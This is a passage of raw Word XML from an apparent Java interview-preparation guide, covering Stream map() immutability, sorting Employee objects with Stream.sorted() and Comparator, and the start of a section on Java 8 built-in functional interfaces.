      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>toList</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2533AECE" w14:textId="77777777" w:rsidR="00207C68" w:rsidRPr="00207C68" w:rsidRDefault="00207C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360760"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23573792" w14:textId="17D16C7B" w:rsidR="00207C68" w:rsidRPr="00207C68" w:rsidRDefault="00207C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360760"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>names</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00207C68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Original list still: [Siddhant, Patni]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533995E2" w14:textId="17E283CA" w:rsidR="008E2975" w:rsidRPr="008E2975" w:rsidRDefault="008E2975" w:rsidP="008E2975">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6337ED3F" w14:textId="77777777" w:rsidR="008E2975" w:rsidRPr="008E2975" w:rsidRDefault="008E2975" w:rsidP="008E2975">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2975">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Quick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8"/>
        <w:gridCol w:w="3290"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E2975" w:rsidRPr="008E2975" w14:paraId="002CA743" w14:textId="77777777" w:rsidTr="008E2975">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7395642C" w14:textId="77777777" w:rsidR="008E2975" w:rsidRPr="008E2975" w:rsidRDefault="008E2975" w:rsidP="008E2975">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E2975">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4530E777" w14:textId="77777777" w:rsidR="008E2975" w:rsidRPr="008E2975" w:rsidRDefault="008E2975" w:rsidP="008E2975">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E2975">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E2975" w:rsidRPr="008E2975" w14:paraId="48B78006" w14:textId="77777777" w:rsidTr="008E2975">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C195F73" w14:textId="77777777" w:rsidR="008E2975" w:rsidRPr="008E2975" w:rsidRDefault="008E2975" w:rsidP="008E2975">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E2975">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="046F9BC5" w14:textId="77777777" w:rsidR="008E2975" w:rsidRPr="008E2975" w:rsidRDefault="008E2975" w:rsidP="008E2975">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E2975">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Transform each element</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E2975" w:rsidRPr="008E2975" w14:paraId="6836F61E" w14:textId="77777777" w:rsidTr="008E2975">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42B74D82" w14:textId="77777777" w:rsidR="008E2975" w:rsidRPr="008E2975" w:rsidRDefault="008E2975" w:rsidP="008E2975">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E2975">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Changes Original?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D253A37" w14:textId="77777777" w:rsidR="008E2975" w:rsidRPr="008E2975" w:rsidRDefault="008E2975" w:rsidP="008E2975">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E2975">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>No, original data stays the same</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E2975" w:rsidRPr="008E2975" w14:paraId="6452F0CA" w14:textId="77777777" w:rsidTr="008E2975">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F8CC833" w14:textId="77777777" w:rsidR="008E2975" w:rsidRPr="008E2975" w:rsidRDefault="008E2975" w:rsidP="008E2975">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E2975">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76E90432" w14:textId="77777777" w:rsidR="008E2975" w:rsidRPr="008E2975" w:rsidRDefault="008E2975" w:rsidP="008E2975">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E2975">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>New Stream with mapped elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BA94942" w14:textId="14F2C809" w:rsidR="008E2975"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7E69BC5">
          <v:rect id="_x0000_i1735" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="218E27C6" w14:textId="77777777" w:rsidR="00A32340" w:rsidRPr="00CE4B95" w:rsidRDefault="00A32340">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="237" w:name="_Toc196307717"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How to sort the list of objects in java using Stream API?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="237"/>
    </w:p>
    <w:p w14:paraId="4136BBAD" w14:textId="27AEA4B6" w:rsidR="00F15F96" w:rsidRPr="009E5D84" w:rsidRDefault="00F15F96" w:rsidP="00326649">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E5D84">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You can sort a list of custom objects in Java using the </w:t>
      </w:r>
      <w:r w:rsidRPr="009E5D84">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stream.sorted()</w:t>
      </w:r>
      <w:r w:rsidRPr="009E5D84">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method along with a </w:t>
      </w:r>
      <w:r w:rsidRPr="009E5D84">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="009E5D84">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCAA919" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008865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03D5811">
          <v:rect id="_x0000_i1736" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C60856" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865B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Sorting a List of Employees by Age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403AA695"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 Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251565B7"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ring name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EBF12D"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int age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36902111" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865BD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52515B39"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onstructor, getters, setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16256F94"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Employee(String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35363A63"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6AB596"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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C54297"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E986183"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ring getName() { return name; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E1C371"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int getAge() { return age; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E13B29F"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4B85F3E" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008865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C683867">
          <v:rect id="_x0000_i1737" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="102AB36E" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865B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ort by Age (Ascending):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513237A3"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Employee&gt; sortedList = employeeList.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8D364B"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orted(Comparator.comparing(Employee::getAge))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A689910"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C4CF07" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008865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548920B">
          <v:rect id="_x0000_i1738" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E47460B" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865B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ort by Age (Descending):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F56C945"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Employee&gt; sortedListDesc = employeeList.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F743B87"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orted(Comparator.comparing(Employee::getAge).reversed())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491C6D41"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62982DD4" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008865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C17ACE7">
          <v:rect id="_x0000_i1739" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03230858" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865B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ort by Multiple Fields (Age, then Name):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7203C1C7"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Employee&gt; sortedMulti = employeeList.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152DD6C6"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orted(Comparator.comparing(Employee::getAge)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A952E7E"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enComparing(Employee::getName))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682552F7" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96"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llect(Collectors.toList());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AECBA99" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008865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350EBE4">
          <v:rect id="_x0000_i1740" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BF7CDC" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865B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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B25F8BC" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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orted() is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>intermediate operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Stream API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC424F4" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Comparator.comparing() for property-based comparison.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CA8A9F" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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 chain thenComparing() for multi-level sorting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E9D065" w14:textId="53641E3F" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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8F9D4C3">
          <v:rect id="_x0000_i1741" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1387EBF5" w14:textId="77777777" w:rsidR="00E94AED" w:rsidRPr="00CE4B95" w:rsidRDefault="00E94AED">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="238" w:name="_Toc196307718"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the inbuilt functional interface in Java 8?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="238"/>
    </w:p>
    <w:p w14:paraId="6F254751" w14:textId="42794F03" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Inbuilt Functional Interfaces in Java 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042DD695" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC"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Java 8 introduced several </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inbuilt functional interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
